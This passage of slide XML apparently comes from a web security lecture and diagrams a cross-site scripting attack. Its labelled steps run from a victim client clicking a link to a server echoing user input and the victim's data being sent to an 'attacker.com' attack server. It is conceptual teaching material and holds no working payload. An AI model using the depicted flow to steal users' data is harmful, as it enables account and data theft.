        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a: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09600" y="2907136"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="5208588"/>
            <a:ext cx="1152110" cy="1406460"/>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5631877" y="2133600"/>
            <a:ext cx="2301433" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016625" y="1767840"/>
            <a:ext cx="1520825" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="4191000"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="5094017"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3131668" y="4324147"/>
            <a:ext cx="1325052" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>click </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2417361" y="4699080"/>
            <a:ext cx="1828745" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-157" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714739" y="3933939"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714739" y="3933939"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2779163" y="3988389"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845129" y="4585019"/>
            <a:ext cx="3260725" cy="1130300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3260725" h="1130300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3260270" y="1129980"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777782" y="4550892"/>
            <a:ext cx="122520" cy="89301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2198688" y="3143109"/>
            <a:ext cx="3115945" cy="667385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3115945" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="666890"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3115751" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5262003" y="3104124"/>
            <a:ext cx="121635" cy="91421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20940000">
            <a:off x="2919013" y="3035719"/>
            <a:ext cx="2122815" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>send </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>valuable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-232" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="5555" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="5555">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="3276600"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="3283902"/>
            <a:ext cx="2503805" cy="1176655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2028939" y="4235564"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
